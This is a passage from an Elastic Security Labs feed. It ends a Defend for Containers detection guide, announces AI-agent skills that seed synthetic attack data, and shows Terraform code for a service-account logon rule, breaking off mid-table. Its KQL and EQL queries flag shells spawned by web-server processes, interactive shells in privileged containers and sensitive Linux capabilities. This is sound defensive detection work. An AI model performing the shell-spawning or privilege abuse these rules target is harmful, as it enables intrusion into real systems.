<p>This layer of enrichment allows container-aware detection logic to be expressed directly, without having to infer intent indirectly from filesystem paths, cgroups, or namespace identifiers.</p>
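<p>As a hedged example, a KQL filter combining this enrichment to surface process executions in privileged containers outside <code>kube-system</code> could read:</p>
<pre><code class="language-text">event.category : "process" and event.action : "exec"
  and container.security_context.privileged : true
  and not orchestrator.namespace : "kube-system"
</code></pre>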
<h3>Process events</h3>
<p>Process execution is one of the most important signal types that Defend for Containers provides. Process events capture <code>fork</code>, <code>exec</code>, and <code>end</code> activities within containers and expose detailed lineage information critical to understanding how execution unfolds at runtime.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image12.png" alt="Figure 15: Defend for Containers’ important process.* fields overview" title="Figure 15: Defend for Containers’ important `process.*` fields overview" /></p>
<p>Several fields are particularly important for detection engineering. The combination of <code>process.name</code> and <code>process.executable</code> identifies what was executed and from where, while <code>process.args</code> provides insight into how it was invoked. Fields such as <code>process.pid</code>, <code>process.start</code>, <code>process.end</code>, and <code>process.exit_code</code> describe the process lifecycle and are useful for timing analysis and execution-flow reconstruction. The <code>process.entity_id</code> provides a stable identifier that allows processes to be tracked across multiple related events.</p>
<p>Defend for Containers also captures rich ancestry information. Fields under <code>process.parent.*</code> describe the immediate parent process, making it possible to detect suspicious parent–child relationships such as shells spawned by unexpected binaries. In addition, <code>process.entry_leader.*</code> and <code>process.session_leader.*</code> provide higher-level anchors within the process tree.</p>
<p>Much like Elastic Defend, Defend for Containers models processes as a graph rather than isolated events. The entry leader is especially useful in container environments, as it often represents the initial process launched by the container runtime (for example, <code>containerd</code>, <code>runc</code>, or a shell specified as the container entrypoint). Anchoring detections to the entry leader allows process trees to be interpreted consistently, even when containers spawn many short-lived child processes.</p>
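<p>A short EQL sketch of such a suspicious parent–child relationship, a shell spawned by a long-running service process (the parent names are illustrative, not a vetted rule):</p>
<pre><code class="language-text">process where event.action == "exec" and
  process.name in ("bash", "sh", "dash") and
  process.parent.name in ("nginx", "node", "java")
</code></pre>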
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image15.png" alt="Figure 16: Defend for Containers’ important process.session* fields overview" title="Figure 16: Defend for Containers’ important `process.session*` fields overview" /></p>
<p>Session leader fields provide additional context about interactive execution and session boundaries, helping distinguish background services from interactive or attacker-driven activity.</p>
<p>Together, these fields make it possible to express detection logic that goes beyond single executions and instead reasons about execution chains, lineage, and intent, which is essential for detecting real-world container attack techniques.</p>
<h4>Capabilities and privilege context</h4>
<p>One of the more powerful aspects of the Defend for Containers process events is the inclusion of Linux capability information. For each process, Defend for Containers exposes both the effective and permitted capability sets via:</p>
<ul>
<li><code>process.thread.capabilities.effective</code></li>
<li><code>process.thread.capabilities.permitted</code></li>
</ul>
<p>These fields describe what a process is actually allowed to do at runtime, independent of its user ID or container boundary.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image14.png" alt="Figure 17: Defend for Containers’ important process.thread.capabilities.* fields overview" title="Figure 17: Defend for Containers’ important `process.thread.capabilities.*` fields overview" /></p>
<p>In privileged containers, processes often expose a broad set of effective capabilities, including highly sensitive ones such as <code>CAP_SYS_ADMIN</code>, <code>CAP_SYS_MODULE</code>, <code>CAP_SYS_PTRACE</code>, <code>CAP_SYS_RAWIO</code>, and <code>CAP_BPF</code>. The presence of these capabilities significantly changes the risk profile of any executed command, as they enable actions that can directly impact the host kernel or other workloads.</p>
<p>From a detection engineering perspective, this context is critical. It allows detections to move beyond simple process-name matching and instead reason about <em>impact</em>. The same binary execution can have vastly different implications depending on whether it runs with a minimal capability set or with near-host-level privileges.</p>
<p>In practice, capability data enables detection engineers to:</p>
<ul>
<li>Identify suspicious tooling executed inside overly permissive containers.</li>
<li>Correlate runtime behavior with dangerous capability combinations.</li>
<li>Prioritize alerts based on actual exploitation potential rather than surface-level activity.</li>
</ul>
<p>This becomes especially relevant to container breakout research, where the presence or absence of specific capabilities often determines whether an exploit is viable.</p>
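<p>For instance, a hedged KQL sketch that flags executions holding host-impacting effective capabilities (the capability list should be tuned to your threat model):</p>
<pre><code class="language-text">event.category : "process" and event.action : "exec"
  and process.thread.capabilities.effective : ("CAP_SYS_ADMIN" or "CAP_SYS_MODULE" or "CAP_BPF")
</code></pre>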
<h4>Interactive execution</h4>
<p>The <code>process.interactive</code> field indicates whether a process is associated with an interactive session. In container environments, interactive execution is relatively rare for production workloads and often correlates strongly with post-compromise or hands-on-keyboard activity.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image4.png" alt="Figure 18: Defend for Containers’ important process.*.interactive fields overview" title="Figure 18: Defend for Containers’ important `process.*.interactive` fields overview" /></p>
<p>Defend for Containers exposes interactivity not only at the process level, but also across related execution contexts, including <code>process.parent.interactive</code>, <code>process.entry_leader.interactive</code>, and <code>process.session_leader.interactive</code>. This makes it possible to determine whether an entire execution chain is interactive, rather than relying on a single process flag in isolation.</p>
<p>Common examples of interactive execution within containers include spawning a <code>bash</code> or <code>sh</code> shell, running interactive utilities such as <code>curl</code>, <code>kubectl</code>, or <code>busybox</code>, or operator-driven reconnaissance within a compromised Pod. While these actions may be legitimate during debugging, they are uncommon in steady-state production workloads.</p>
<p>When combined with container image, namespace, and privilege context, interactive execution becomes a strong anomaly signal. It allows detection logic to distinguish between expected automated container behavior and activity more consistent with manual intervention or attacker-driven exploration.</p>
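<p>Combining these signals, a hedged KQL sketch of an interactive shell inside a privileged container might look like:</p>
<pre><code class="language-text">event.category : "process" and event.action : "exec"
  and process.interactive : true
  and process.name : ("bash" or "sh")
  and container.security_context.privileged : true
</code></pre>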
<h3>File events</h3>
<p>Defend for Containers file events capture filesystem activity inside containers, and are emitted for a variety of operations. Unlike traditional file integrity monitoring, these events are runtime-aware and scoped to container workloads, providing context about <em>how</em> and <em>why</em> file changes occur.</p>
<p>Defend for Containers can detect file activity such as file opens <strong>with write intent</strong>, content modifications, file creations, renames, permission changes, and deletions. By focusing on write-oriented operations, Defend for Containers emphasizes behavior that alters system state rather than passive file access.</p>
<p>This allows detection engineers to reason about file usage patterns at runtime, not just the result of a change.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image6.png" alt="Figure 19: Defend for Containers’ important file events overview" title="Figure 19: Defend for Containers’ important `file` events overview" /></p>
<p>Several fields are particularly important when building file-based detections. The <code>file.path</code> and <code>file.name</code> fields identify the affected file and its location, while <code>file.extension</code> can help distinguish binaries, scripts, and configuration files. The <code>event.action</code> and <code>event.type</code> fields describe what operation occurred and how it should be interpreted in the event lifecycle.</p>
<p>Together, these fields allow Defend for Containers to distinguish benign file access from suspicious modification patterns, such as writing binaries or changing permissions within sensitive directories.</p>
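<p>As an illustrative sketch (assuming the file data stream follows the <code>cloud_defend.file</code> naming convention), a KQL query for file creations and modifications under a sensitive directory:</p>
<pre><code class="language-text">event.dataset : "cloud_defend.file" and event.category : "file"
  and event.action : ("creation" or "modification")
  and file.path : /usr/bin/*
</code></pre>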
<h3>Bringing it together</h3>
<p>As with any other data source, Defend for Containers telemetry becomes truly valuable once you understand how to combine fields across the process, file, container, and orchestration domains. Rather than relying on static indicators, Defend for Containers enables detection engineering based on runtime behavior, privilege context, and workload identity.</p>
<h2>Conclusion</h2>
<p>Defend for Containers, available in Elastic Stack 9.3.0, makes container runtime detection a core component of Linux detection engineering. It features a clear scope, a policy-driven configuration model, and runtime telemetry designed specifically for containerized workloads.</p>
<p>In this post, we examined how to deploy Defend for Containers, how its policy model is structured, and how runtime events are generated and enriched with container and orchestration context. We explored the structure of process and file events, capability metadata, interactive execution signals, and container-specific fields that allow detections to be expressed in a workload-aware manner.</p>
<p>The key takeaway is that effective container detection requires reasoning about runtime behavior in context: processes, file modifications, privileges, and workload identity must be evaluated together. Defend for Containers provides the necessary telemetry to make that possible.</p>
<p>In the next article, we will build on this foundation by walking through a realistic container attack scenario and demonstrating how Defend for Containers telemetry surfaces each stage of compromise in practice.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/getting-started-with-defend-for-containers.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Get started with Elastic Security from your AI agent]]></title>
            <link>https://www.elastic.co/kr/security-labs/agent-skills-elastic-security</link>
            <guid>agent-skills-elastic-security</guid>
            <pubDate>Tue, 17 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Go from zero to a fully populated Elastic Security environment without leaving your IDE, using open source Agent Skills.]]></description>
            <content:encoded><![CDATA[<h2>Get started with Elastic Security from your AI agent</h2>
<p><a href="https://github.com/elastic/agent-skills/tree/main">Elastic Agent Skills</a> are open source packages that give your AI coding agent native Elastic expertise. If you're already using <a href="https://www.elastic.co/kr/security-labs/from-alert-fatigue-to-agentic-response">Elastic Agent Builder</a>, you get AI agents that work natively with your security data. Agent Skills are for the other side: bringing that same Elastic Security knowledge to the external AI tools your team already uses, like Cursor, Claude Code, or GitHub Copilot.</p>
<p>If you use an AI coding agent and want to evaluate Elastic Security, or you're a security team that wants to get up and running with Elastic Security fast without navigating setup docs, these are for you. Today we're shipping security skills that take you from zero to a fully populated Elastic Security environment, without leaving your integrated development environment (IDE).</p>
<p>Before you dive in, note that this is a v0.1.0 release. Also, review <a href="https://github.com/elastic/agent-skills/blob/main/README.md">this documentation</a> for steps to get started and important security considerations.</p>
<h3>Step 1: Create a security project</h3>
<p>You open your AI coding agent and prompt: <em>Create a Security project on Elastic Cloud.</em></p>
<p>The <a href="https://github.com/elastic/agent-skills/tree/main/skills/cloud/create-project"><code>create-project</code></a> skill provisions an Elastic Cloud Serverless Security project via the Elastic Cloud API, handles credentials securely, and hands you back your Elasticsearch and Kibana URLs.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/agent-skills-elastic-security/image1.png" alt="Confirmation message showing a new Elastic Security project named “security‑eval” created in the us‑east‑1 region, with saved credentials and links to Elasticsearch and Kibana." title="Confirmation message showing a new Elastic Security project named “security‑eval” created in the us‑east‑1 region, with saved credentials and links to Elasticsearch and Kibana." /></p>
<p>Elastic Cloud Serverless supports regions across Amazon Web Services (AWS), Google Cloud Platform (GCP), and Azure, so you can pick whichever fits your environment.</p>
<p>One prompt. Project ready.</p>
<h3>Step 2: Generate sample data</h3>
<p>An empty Elastic Security project isn't very convincing. No alerts, no timelines, no process trees. You need data, but you don't always want to enable real data sources before you've had a chance to explore.</p>
<p>The <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/generate-security-sample-data"><code>generate-security-sample-data</code></a> skill populates your project with realistic, Elastic Common Schema–compliant (ECS-compliant) security events and synthetic alerts across four attack scenarios:</p>
<ul>
<li><strong>Windows ransomware chain:</strong> Word macro to PowerShell to ransomware deployment, complete with process trees that light up the Analyzer view.</li>
<li><strong>Credential access:</strong> LSASS memory dumps and credential harvesting.</li>
<li><strong>AWS cloud privilege escalation:</strong> IAM policy manipulation and unauthorized access key creation.</li>
<li><strong>Okta identity attack:</strong> Multifactor authentication (MFA) factor deactivation and suspicious authentication patterns.</li>
</ul>
<p>These aren't random events. Every alert maps to <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/mitre-attandckr-coverage"><strong>MITRE ATT&amp;CK</strong></a> techniques. Process trees have proper entity IDs so the <strong>Analyzer</strong> renders real parent-child relationships. <strong>Attack Discovery</strong> picks up the correlated threat narratives. You get the experience of a live environment without needing one.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/agent-skills-elastic-security/image4.png" alt="Interface showing generated sample security data with 301 indexed events, 15 synthetic alerts, and a prompt to open Kibana Security alerts." title="Interface showing generated sample security data with 301 indexed events, 15 synthetic alerts, and a prompt to open Kibana Security alerts." /></p>
<p>When you're done exploring, ask your AI coding agent to remove the sample data. All sample events, alerts, and cases are cleaned up without affecting the rest of your environment.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/agent-skills-elastic-security/image2.png" alt="Terminal output confirming that sample events, alerts, and cases have been removed." title="Terminal output confirming that sample events, alerts, and cases have been removed." /></p>
<h3>Step 3: What's next after sample data</h3>
<p>Once your environment is populated, the same AI coding agent can help you work with it. We're also shipping skills for <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/alert-triage"><strong>alert triage</strong></a> (fetch and investigate alerts, classify threats, and acknowledge alerts), <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/detection-rule-management"><strong>detection rule management</strong></a> (find noisy rules, add exceptions, and create new coverage), and <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/case-management"><strong>case management</strong></a> (create and track security operations center [SOC] cases and link alerts to incidents).</p>
<h3>Why skills, not just docs?</h3>
<p>Elastic's API documentation is <a href="https://www.elastic.co/kr/docs/api/">public</a>. Your AI agent can already read it. So why do skills matter?</p>
<p>Skills matter because docs describe individual endpoints, while skills encode workflows. There's a real gap between knowing that <code>POST /api/detection_engine/signals/search</code> exists and knowing that you need to fetch the oldest unacknowledged alert, query the process tree and related alerts within a five-minute window of the trigger time, check for an existing case before creating a new one, attach the alert with its rule UUID, and then acknowledge all related alerts on the same host, in that order, with the right field names, across three different APIs.</p>
<p>Skills also encode what <em>not</em> to do: Never display credentials in chat, confirm before creating billable resources, and handle Serverless-specific API quirks. This is the expert knowledge that turns a general-purpose AI agent into one that actually knows Elastic.</p>
<h3>Get started</h3>
<p>All <a href="https://github.com/elastic/agent-skills">skills</a> are open source and work with any supported AI coding agent:</p>
<ul>
<li>Cursor</li>
<li>Claude Code</li>
<li>GitHub Copilot</li>
<li>Windsurf</li>
<li>Cline</li>
<li>OpenCode</li>
<li>Gemini CLI</li>
</ul>
<p>Open a terminal in your project workspace and run:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/agent-skills-elastic-security/image3.png" alt="Code line: npx skills add elastic/agent-skills." title="Code line: npx skills add elastic/agent-skills" /></p>
<p>Or install specific skills:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/agent-skills-elastic-security/image5.png" alt="Code lines to add specific skills." title="Code lines to add specific skills." /></p>
<p>Check out the full catalog at <a href="https://github.com/elastic/agent-skills">github.com/elastic/agent-skills</a>.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/agent-skills-elastic-security/agent-skills-elastic-security.jpg" length="0" type="image/jpeg"/>
        </item>
        <item>
            <title><![CDATA[Managing Elastic Security Detection Rules with Terraform]]></title>
            <link>https://www.elastic.co/kr/security-labs/managing-rules-with-terraform</link>
            <guid>managing-rules-with-terraform</guid>
            <pubDate>Fri, 13 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn to define and deploy Elastic Security detection rules and exceptions using the Elastic Stack Terraform Provider vs detection-rules repository DaC capabilities.]]></description>
            <content:encoded><![CDATA[<p>At the core of Elastic Security lie <a href="https://www.elastic.co/kr/blog/elastic-security-detection-engineering">outstanding detection capabilities</a>, allowing users to <a href="https://www.elastic.co/kr/blog/elastic-security-building-effective-threat-hunting-detection-rules">create</a>, test, tune, manage, and deploy detection rules, as code, in their environments. The ability to create robust detections is critical for security operations, because detection logic elevates the threat signal above the telemetry noise.</p>
<p>This article highlights how Elastic's new Terraform resources for security detection rules and exceptions expand practitioners' capabilities for detection-as-code deployment. Below, you will find examples of defining and deploying your detection artifacts in Elastic Security with Terraform. We will also show how you can use Elastic's AI Agent to quickly create the Terraform configuration for your custom rules. Finally, we provide guidance on when to use the Elastic Stack Terraform <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">provider</a> versus <a href="https://github.com/elastic/detection-rules/blob/main/README.md#detections-as-code-dac">tools from the detection-rules repository</a>.</p>
<h2>Managing Elastic with Terraform</h2>
<p><a href="https://developer.hashicorp.com/terraform">Terraform</a> is a tool created by HashiCorp (now IBM) to manage infrastructure, in the cloud or in self-managed environments, as code. Using HCL (HashiCorp Configuration Language), users define the desired state of their cloud provider infrastructure, applications, and configuration, and, in Elastic’s case, cluster settings, indices or streams, and now also detection rules and exceptions, as fully configurable, traceable, and reviewable code in their favorite source management tool.</p>
<p>The <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">Elastic Stack Terraform provider</a> helps search, observability, and security professionals, as well as DevOps engineers and SREs, configure their Elastic clusters: the right indices and mappings for search use cases, SLOs or Fleet policies for observability, and now detection rules and exceptions for security. It can configure these, and many more objects and settings, in the Elastic Stack.</p>
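<p>For teams new to the provider, a minimal configuration might look like the following sketch. The variable names and the API-key authentication choice are illustrative; see the provider documentation linked above for the full set of connection options.</p>
<pre><code>terraform {
  required_providers {
    elasticstack = {
      source  = &quot;elastic/elasticstack&quot;
      version = &quot;&gt;= 0.13.0&quot;
    }
  }
}

# Connection details for Elasticsearch and Kibana; the values behind
# these variables are placeholders for your own deployment.
provider &quot;elasticstack&quot; {
  elasticsearch {
    endpoints = [var.elasticsearch_endpoint]
    api_key   = var.elastic_api_key
  }
  kibana {
    endpoints = [var.kibana_endpoint]
  }
}
</code></pre>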
<h2>Security Detection rules - now as code with Terraform</h2>
<p>With <a href="https://github.com/elastic/terraform-provider-elasticstack/releases/tag/v0.12.0">v0.12.0</a> and <a href="https://github.com/elastic/terraform-provider-elasticstack/releases/tag/v0.13.0">v0.13.0</a> of the <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">Elastic Stack Terraform provider</a>, users can now manage their detection rules and rule exceptions using Terraform. This is especially useful for users who already manage their Elastic deployments with Terraform and want to extend that management to detection rules.</p>
<h3>Using the Elastic Stack Terraform Provider to deploy Rules and Exceptions</h3>
<p>Let's look at an example of using the Elastic Stack Terraform Provider to deploy an Elastic Security Rule. In this example, we want to detect Windows Service Accounts that are performing an interactive logon on a host.</p>
<p>Service accounts typically have elevated privileges and rarely-rotated passwords, making them high-value targets for attackers. Since these accounts should only perform automated service logons, an interactive logon can indicate credential theft or misuse.</p>
<p>The first thing we need to think of is what telemetry we need to see which logons are happening on our host. <a href="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4624">Logon events</a> are logged by the Windows Local Security Authority Subsystem Service (LSASS) whenever a logon session is successfully created on the machine. We can pick this up via an Elastic Agent with the <a href="https://www.elastic.co/kr/docs/reference/integrations/windows">Windows Integration</a> installed.</p>
<p>The Elastic Agent writes this data into the system.security data stream, which we can match with the index pattern <code>logs-system.security-*</code>. We also know that logon events generate event code <code>4624</code> and that, in our example, service account names start with <code>svc</code> or end with <code>$</code>. In addition, an interactive logon will have a logon type of <code>interactive</code>.</p>
<p>So, we can match these events with an <a href="https://www.elastic.co/kr/docs/reference/query-languages/esql">ES|QL</a> rule like:</p>
<pre><code class="language-sql">FROM logs-system.security-*
| WHERE event.code == &quot;4624&quot; AND (user.name LIKE &quot;svc_*&quot; OR user.name LIKE &quot;svc-*&quot;
     OR user.name LIKE &quot;*_svc&quot; OR user.name LIKE &quot;*$&quot;)
     AND winlog.logon.type IN (&quot;Interactive&quot;, &quot;RemoteInteractive&quot;,
         &quot;CachedInteractive&quot;, &quot;CachedRemoteInteractive&quot;)
</code></pre>
<p>There may be situations where we don't want this rule to alert, for example, if there is a legacy application that we want to permit interactive logons from. So, we can create an <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/rule-exceptions">Exception Item</a>, like: <code>user.name IS svc_sqlbackup</code>.</p>
<p>Now that we know what we want the Rule and its Exceptions to look like, we can use the Terraform provider's <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">elasticstack_kibana_security_detection_rule</a>, <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_exception_list">elasticstack_kibana_security_exception_list</a>, and <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_exception_item">elasticstack_kibana_security_exception_item</a> resources to define them in code.</p>
<p>Turning ES|QL rules into Terraform's configuration syntax, <a href="https://developer.hashicorp.com/terraform/language/syntax/configuration">HCL</a>, is a great use case for Elastic's <a href="https://www.elastic.co/kr/docs/solutions/security/ai/agent-builder/agent-builder">AI Agent</a>.<br />
Elastic AI Agent capabilities help accelerate security operations across a wide range of tasks, from <a href="https://www.elastic.co/kr/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">alert triage and incident response</a> to detection lifecycle tasks.</p>
<p>Simply open AI Agent, and ask it to create Terraform configurations based on your query and exceptions.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/managing-rules-with-terraform/image2.png" alt="" /></p>
<p>You should end up with something like this:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/managing-rules-with-terraform/image1.png" alt="" /></p>
<p>Here's a closer look at the code.</p>
<p>There are a few elements to call out specifically:</p>
<ul>
<li><code>type</code>: The type of exception list. For example: <code>detection</code>, <code>endpoint</code>, or <code>endpoint_trusted_apps</code></li>
<li><code>namespace_type</code>: Determines whether the exception list is available in all Kibana spaces or just the single space in which it was created.</li>
</ul>
<pre><code>resource &quot;elasticstack_kibana_security_exception_list&quot; &quot;svc_account_interactive_login&quot; {
  list_id        = &quot;svc-account-interactive-login-exceptions&quot;
  name           = &quot;Service Account Interactive Login Exceptions&quot;
  description    = &quot;Documented exceptions for service accounts that legitimately require interactive logon&quot;
  type           = &quot;detection&quot;
  namespace_type = &quot;single&quot;
  tags           = [&quot;service-accounts&quot;,&quot;windows&quot;,&quot;authentication&quot;]
}  
</code></pre>
<p>This creates a new exception list.</p>
<p>Of note, the <code>entries</code> array contains the conditions under which the exception applies.</p>
<pre><code>resource &quot;elasticstack_kibana_security_exception_item&quot; &quot;svc_sqlbackup&quot; {
  list_id        = elasticstack_kibana_security_exception_list.svc_account_interactive_login.list_id
  item_id        = &quot;svc-sqlbackup-exception&quot;
  name           = &quot;svc_sqlbackup - Legacy SQL Backup Agent&quot;
  description    = &quot;Approved exception: Legacy SQL backup agent requires interactive logon per vendor documentation.&quot;
  type           = &quot;simple&quot;
  namespace_type = &quot;single&quot;
  tags           = [&quot;sql&quot;,&quot;backup&quot;,&quot;approved&quot;]
  entries = [
    {
      field    = &quot;user.name&quot;
      type     = &quot;match&quot;
      operator = &quot;included&quot;
      value    = &quot;svc_sqlbackup&quot;
    }
  ]
} 
</code></pre>
<p>This adds our exception: the rule will not alert when the username is <code>svc_sqlbackup</code>.</p>
<p>Of note, the elements from <code>enabled</code> to the <code>technique</code> array are examples of the other properties that can be set on a rule.</p>
<pre><code>resource &quot;elasticstack_kibana_security_detection_rule&quot; &quot;svc_account_interactive_login&quot; {
  name        = &quot;Service Account Interactive Login&quot;
  description = &lt;&lt;-EOT
    Detects interactive logins by service accounts. Service accounts should authenticate
    via service (Type 5) or batch (Type 4) logon types, not interactively. Interactive
    logins by service accounts may indicate credential theft or misuse.

    This rule identifies service accounts by common naming conventions (svc_*, svc-*,
    *_svc) and managed service accounts (*$).
  EOT

  type     = &quot;esql&quot;
  language = &quot;esql&quot;
  query    = &lt;&lt;-EOT
    FROM logs-system.security-* metadata _id, _version, _index
    | WHERE event.code == &quot;4624&quot;
      AND (user.name LIKE &quot;svc_*&quot; OR user.name LIKE &quot;svc-*&quot; OR user.name LIKE &quot;*_svc&quot; OR user.name LIKE &quot;*$&quot;)
      AND winlog.logon.type IN (&quot;Interactive&quot;, &quot;RemoteInteractive&quot;, &quot;CachedInteractive&quot;, &quot;CachedRemoteInteractive&quot;)
    | KEEP @timestamp, host.name, user.name, user.domain, winlog.logon.type, source.ip, _id, _version, _index
  EOT

  enabled    = true 
  severity   = &quot;high&quot;
  risk_score = 73

  from     = &quot;now-6m&quot;
  to       = &quot;now&quot;
  interval = &quot;5m&quot;

  author  = [&quot;Security Team&quot;]
  license = &quot;Elastic License v2&quot;
  tags    = [
    &quot;Domain: Endpoint&quot;,
    &quot;OS: Windows&quot;,
    &quot;Use Case: Identity and Access Audit&quot;,
    &quot;Tactic: Initial Access&quot;,
    &quot;Data Source: Windows Security Event Log&quot;
  ]

  false_positives = [
    &quot;Service accounts with documented exceptions that require interactive logon&quot;,
    &quot;Break-glass procedures during incident response&quot;,
    &quot;Initial service account configuration or troubleshooting&quot;
  ]

  references = [
    &quot;https://learn.microsoft.com/en-us/entra/architecture/service-accounts-on-premises&quot;,
    &quot;https://blog.quest.com/10-microsoft-service-account-best-practices/&quot;,
    &quot;https://attack.mitre.org/techniques/T1078/002/&quot;
  ]

  threat = [
    {
      framework = &quot;MITRE ATT&amp;CK&quot;
      tactic = {
        id        = &quot;TA0001&quot;
        name      = &quot;Initial Access&quot;
        reference = &quot;https://attack.mitre.org/tactics/TA0001/&quot;
      }
      technique = [
        {
          id        = &quot;T1078&quot;
          name      = &quot;Valid Accounts&quot;
          reference = &quot;https://attack.mitre.org/techniques/T1078/&quot;
          subtechnique = [
            {
              id        = &quot;T1078.002&quot;
              name      = &quot;Domain Accounts&quot;
              reference = &quot;https://attack.mitre.org/techniques/T1078/002/&quot;
            }
          ]
        }
      ]
    }
  ]

  exceptions_list = [
    {
      id             = elasticstack_kibana_security_exception_list.svc_account_interactive_login.id
      list_id        = elasticstack_kibana_security_exception_list.svc_account_interactive_login.list_id
      namespace_type = elasticstack_kibana_security_exception_list.svc_account_interactive_login.namespace_type
      type           = elasticstack_kibana_security_exception_list.svc_account_interactive_login.type
    }
  ]
}
</code></pre>
<p>Finally, we define the rule, including the ES|QL query we provided earlier and MITRE ATT&amp;CK classification.</p>
<p>You can add these resource definitions into one configuration file (perhaps <code>security-rules.tf</code>), add it to your <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs#kibana">configured</a> Elastic Stack Terraform directory, and then run <code>terraform apply</code> to deploy the rule.</p>
<pre><code class="language-shell">terraform apply --auto-approve
</code></pre>
<p>Since <code>terraform apply</code> runs a plan before making changes, it will automatically detect if anyone has edited a rule directly in Kibana and show you exactly what drifted: no manual exports or diffs needed.</p>
<p>After Terraform has made the changes, we can see the Rule in Kibana:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/managing-rules-with-terraform/image5.png" alt="" /></p>
<p>We can also see the Exception List:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/managing-rules-with-terraform/image4.png" alt="" /></p>
<p>This way, you can define your detections in Terraform and benefit from automatic deployment along with other objects you manage with Terraform.</p>
<h2>Terraform workspaces for multi-space Elastic deployments</h2>
<p>Terraform uses a concept called “<a href="https://developer.hashicorp.com/terraform/language/state/workspaces">workspaces</a>,” which lets you reuse the same infrastructure code for multiple deployments, for example, dev, testing, and production environments. This concept is useful for managing rules across multiple deployments and/or Kibana spaces.</p>
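<p>As a sketch, the active workspace name is available as <code>terraform.workspace</code>, which you can use to vary rule attributes per environment. The pattern below is illustrative and reuses the rule resource from the earlier example:</p>
<pre><code>locals {
  # &quot;default&quot;, &quot;dev&quot;, &quot;prod&quot;, ... depending on the selected workspace
  env = terraform.workspace
}

resource &quot;elasticstack_kibana_security_detection_rule&quot; &quot;svc_account_interactive_login&quot; {
  name    = &quot;Service Account Interactive Login (${local.env})&quot;
  # Keep the rule disabled everywhere except production
  enabled = local.env == &quot;prod&quot;
  # ... remaining attributes as in the full example above
}
</code></pre>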
<h2>Managing detections with Terraform and Detections as code</h2>
<p>Elastic also has <a href="https://www.elastic.co/kr/security-labs/detection-as-code-timeline-and-new-features">Detections as Code functionality</a> available via our open <a href="https://github.com/elastic/detection-rules">detection-rules repository.</a></p>
<p>The two tools have complementary strengths and are aligned with different user profiles and workflow stages for implementing Detections as Code.</p>
<h3>Detection as Code features in detection-rules</h3>
<ul>
<li><strong>Best fit user profile</strong>: Detection engineers</li>
<li><strong>Intended workflow phase</strong>: Rule authoring and validation</li>
</ul>
<p>With dual-sync between your GitHub repo and Kibana, linting, schema validation, and unit-testing, detection-rules functionality is well-suited to experienced Detection Engineers comfortable with Git-based version control.</p>
<h3>Elastic Stack Terraform Provider</h3>
<ul>
<li><strong>Best fit user profile</strong>: DevOps engineers / Platform teams</li>
<li><strong>Intended workflow phase</strong>: Deployment and operations</li>
</ul>
<p>For users already using Terraform to manage their Elastic clusters, the Terraform Provider is a great fit, bringing consistency to all &quot;x-as-code&quot; operations and familiar state management and parameterization.</p>
<p>The key differences and optimal use cases for each tool are detailed in the comparison table below:</p>
<table>
<thead>
<tr>
<th align="left">Workflow Stage</th>
<th align="left">detection-rules</th>
<th align="left">Terraform Provider</th>
<th align="left">Best Fit</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>Rule Authoring</strong></td>
<td align="left">Purpose-built tooling: create-rule wizard, TOML schema, KQL/EQL validation, field checks against ECS, Kibana-to-code export.</td>
<td align="left">Standard HCL definitions; teams integrate their preferred validation tooling into existing pipelines.</td>
<td align="left"><strong>detection-rules:</strong> Detection engineers authoring and refining rules daily. Teams wanting to automatically convert rules from Kibana into code. <strong>Terraform:</strong> Teams already using Terraform in their workflows, or teams wanting to automate and deploy detection rules as code, but without an established CI/CD platform.</td>
</tr>
<tr>
<td align="left"><strong>Testing &amp; Validation</strong></td>
<td align="left">Built-in unit testing framework, schema validation, query validation, configurable test suites.</td>
<td align="left">Optional unit testing via the native <code>terraform test</code> framework. No built-in query validation: the provider relies on the Kibana API to accept or reject rule definitions at apply time.</td>
<td align="left"><strong>detection-rules:</strong> Teams wanting out-of-the-box detection testing. <strong>Terraform:</strong> Platform teams managing rules as part of broader IaC with existing validation pipelines. Teams happy to write custom tests in Terraform.</td>
</tr>
<tr>
<td align="left"><strong>Exception Management</strong></td>
<td align="left">Native exception list handling; export/import with rules, TOML storage, and rule linking.</td>
